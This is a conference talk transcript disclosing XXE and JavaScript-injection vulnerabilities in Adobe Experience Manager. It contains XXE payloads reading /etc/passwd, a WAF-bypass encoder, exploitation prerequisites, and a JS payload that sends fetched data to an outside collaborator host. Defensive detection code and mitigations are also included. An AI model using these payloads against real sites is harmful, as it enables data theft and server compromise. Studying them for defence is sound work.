A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020

Adobe Experience Manager (AEM) is a comprehensive content management solution for building websites and managing marketing content and assets. I started to look into AEM security back in 2015. Since then I have discovered and reported several server-side vulnerabilities and developed a toolset for AEM hacking to automate security testing of AEM web applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087 and CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise the AEM web application.

In the talk, I will disclose details of the discovered vulnerabilities and exploitation techniques.

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE
    28th – 30th SEPTEMBER 2020
    A Hacker's perspective on AEM applications security
    Mikhail Egorov, Security researcher & bug hunter

  2. Intro

  3. whoami
    ▪ Security researcher & full-time bug hunter
    ▪ https://bugcrowd.com/0ang3el
    ▪ https://hackerone.com/0ang3el
    ▪ Conference speaker
    ▪ https://www.slideshare.net/0ang3el
    ▪ https://speakerdeck.com/0ang3el

  4. whoami
    ▪ Toolset for AEM hacking
    ▪ https://github.com/0ang3el/aem-hacker

  5. APSB19-48

  6. APSB19-48
    ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
    ▪ CVE-2019-8086 / XML eXternal Entity Injection
    ▪ CVE-2019-8087 / XML eXternal Entity Injection
    ▪ CVE-2019-8088 / JavaScript Code Injection

  7. XML eXternal Entity (XXE) attacks
    ▪ Do we see the parsed XML?
    ▪ What’s allowed by the XML parser?
    ▪ General external entities
    ▪ Parameter external entities
    ▪ External DTD loading

  8. XML eXternal Entity (XXE) attacks



    ]>
    &xxe;
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync …

  9. XML eXternal Entity (XXE) attacks



    %xxe;
    ]>

  10. XML eXternal Entity (XXE) attacks

    ]>

  11. CVE-2019-8086
    ▪ GuideInternalSubmitServlet
    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.methods", value = {"POST"}),
        @Property(name = "sling.servlet.selectors", value = {"af.internalsubmit"})
    })
    public class GuideInternalSubmitServlet

  12. CVE-2019-8086

  13. CVE-2019-8086

  14. CVE-2019-8086
    ▪ XXE payload



    ]>
    &a;

  15. CVE-2019-8086

  16. CVE-2019-8086
    ▪ Exploitation hints
    ▪ We can JSON-encode the XXE payload to bypass a WAF
    ▪ In Java we can list directory content
    ▪ /proc/self/cwd

  17. CVE-2019-8086
    ▪ JSON-encoding
    data = 'a SYSTEM "file:///etc/passwd">]>&a;'
    result = ""
    # turn every character into a JSON \u00XX escape
    for c in data:
        result = result + "\\u00%02x" % ord(c)
    print(result)
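The bypass on the two preceding slides works against a filter that only inspects the raw request body. As an added example (not code from the talk), the Python below puts that naive check next to one that JSON-decodes the body before looking for DOCTYPE/ENTITY markers; it assumes the servlet JSON-decodes the request before handing the value to the XML parser, and the sample payload is constructed.

```python
import json
import re

# Every DTD-based XXE (general entity, parameter entity, external DTD) needs a
# DOCTYPE with an ENTITY declaration, so these two markers are the gate.
XXE_MARKERS = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed sample payload in the shape the slides use (file:///etc/passwd).
RAW_PAYLOAD = '<!DOCTYPE a [<!ENTITY a SYSTEM "file:///etc/passwd">]><x>&a;</x>'


def json_unicode_escape(text):
    """The slide's transformation: every character becomes a \\u00XX escape."""
    return "".join("\\u00%02x" % ord(c) for c in text)


def naive_contains_xxe(body):
    """Inspects the raw request body only; this is what the escape defeats."""
    return XXE_MARKERS.search(body) is not None


def _string_leaves(value):
    """Yield every string inside a decoded JSON value (nested dicts/lists)."""
    stack = [value]
    while stack:
        item = stack.pop()
        if isinstance(item, str):
            yield item
        elif isinstance(item, dict):
            stack.extend(item.values())
        elif isinstance(item, list):
            stack.extend(item)


def normalized_contains_xxe(body):
    """Inspect the body as sent and again after JSON decoding, so a value the
    servlet only sees as XML after JSON parsing is checked in that form."""
    if XXE_MARKERS.search(body):
        return True
    try:
        decoded = json.loads(body)
    except ValueError:
        return False
    return any(XXE_MARKERS.search(s) for s in _string_leaves(decoded))


# A JSON request body carrying the escaped payload, as in the slide's bypass.
ENCODED_BODY = '{"data":"%s"}' % json_unicode_escape(RAW_PAYLOAD)
```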

  18. CVE-2019-8086

  19. CVE-2019-8086
    ▪ XXE payload



    ]>
    &a;

  20. CVE-2019-8086

  21. CVE-2019-8086
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  22. CVE-2019-8086
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ Only blind SSRF for some versions

    ]>

  23. CVE-2019-8087
    ▪ WSDLInvokerServlet
    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.selectors", value = {"af.wsdl"}),
        @Property(name = "sling.servlet.methods", value = {"POST"})
    })
    public class WSDLInvokerServlet

  24. CVE-2019-8087

  25. CVE-2019-8087

  26. CVE-2019-8087
    ▪ WSDL example
    ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  27. CVE-2019-8087

  28. CVE-2019-8087
    ▪ Malicious xxe.wsdl



    %dtd;
    %param1;
    ]>




  29. CVE-2019-8087
    ▪ Malicious loot.dtd

    ">

  30. CVE-2019-8087

  31. CVE-2019-8087
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  32. CVE-2019-8087
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ On some AEM versions WSDLInvokerServlet is not present

  33. CVE-2019-8088
    ▪ GuideSubmitServlet
    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.methods", value = {"POST"}),
        @Property(name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"})
    })
    public class GuideSubmitServlet extends SlingAllMethodsServlet {

  34. CVE-2019-8088

  35. CVE-2019-8088

  36. CVE-2019-8088

  37. CVE-2019-8088

  38. CVE-2019-8088

  39. CVE-2019-8088
    ▪ Sandboxed Rhino engine on some AEM versions
    ▪ No RCE
    ▪ Sandbox allows network interactions
    ▪ SSRF with the ability to see the response

  40. CVE-2019-8088
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net');//

  41. CVE-2019-8088

  42. CVE-2019-8088

  43. CVE-2019-8088
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',function(data){jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',{loot:data})});//

  44. CVE-2019-8088

  45. CVE-2019-8088

  46. CVE-2019-8088
    ▪ Exploitation requirements
    ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
    ▪ Attacker should have jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

  47. CVE-2019-8088
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ RCE or SSRF

  48. APSB19-48
    ▪ Keep AEM up to date
    ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
    ▪ Block jcr:write access for anonymous user
    ▪ /content/usergenerated/etc/commerce/smartlists/
    ▪ Remove demo content (Geometrixx, WeRetail, …)
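All three servlets are registered for the fd/af/components/guideContainer resource type, and the exploitation requirement repeated on the slides is a client-created node under the anonymous-writable smartlists subtree. As an added example (not part of the talk or of aem-hacker), this Python scans access-log lines for POSTs whose Sling selectors route to those servlets through a path under /content/usergenerated/; the log layout and sample lines are constructed, and the selector-prefix matching is a simplification of Sling's servlet resolution.

```python
import re

# Selectors that route a POST to the three AEM Forms servlets on the slides;
# all three are registered for the fd/af/components/guideContainer type.
GUIDE_SELECTORS = {
    "af.internalsubmit": "GuideInternalSubmitServlet (CVE-2019-8086)",
    "af.wsdl": "WSDLInvokerServlet (CVE-2019-8087)",
    "af.submit": "GuideSubmitServlet (CVE-2019-8088)",
    "af.agreement": "GuideSubmitServlet (CVE-2019-8088)",
    "af.signSubmit": "GuideSubmitServlet (CVE-2019-8088)",
}
# Subtree the slides name as anonymous-writable: a guideContainer node here
# was created by the client, not shipped with the forms application.
WRITABLE_PREFIX = "/content/usergenerated/"
# Combined-format access log line (layout constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3}'
)

def matched_servlet(path):
    """Sling reads each segment as name.selector(s).extension and resolves a
    servlet on the selector string or a prefix of it; return the servlet reached."""
    for segment in path.split("?", 1)[0].split("/"):
        parts = segment.split(".")
        if len(parts) < 3:
            continue
        selector_string = ".".join(parts[1:-1])
        for sel, servlet in GUIDE_SELECTORS.items():
            if selector_string == sel or selector_string.startswith(sel + "."):
                return servlet
    return None

def scan_access_log(lines):
    """(ip, path, servlet) for each POST reaching a guideContainer servlet via the writable subtree."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        servlet = matched_servlet(m.group("path"))
        if servlet and m.group("path").startswith(WRITABLE_PREFIX):
            findings.append((m.group("ip"), m.group("path"), servlet))
    return findings

# Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Sep/2020:10:00:00 +0000] "POST /content/usergenerated/etc/commerce/smartlists/x.af.internalsubmit.json HTTP/1.1" 200 512
198.51.100.7 - - [30/Sep/2020:10:00:01 +0000] "POST /content/forms/af/contact.af.submit.html HTTP/1.1" 200 210
203.0.113.5 - - [30/Sep/2020:10:00:02 +0000] "POST /content/usergenerated/etc/commerce/smartlists/x.af.wsdl.json HTTP/1.1" 200 33
""".splitlines()
```

The second sample line is a forms submission under a normal content path and is deliberately not reported; the signal is the servlet being reached through a node in the writable subtree.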

  49. Thank you
    @0ang3el
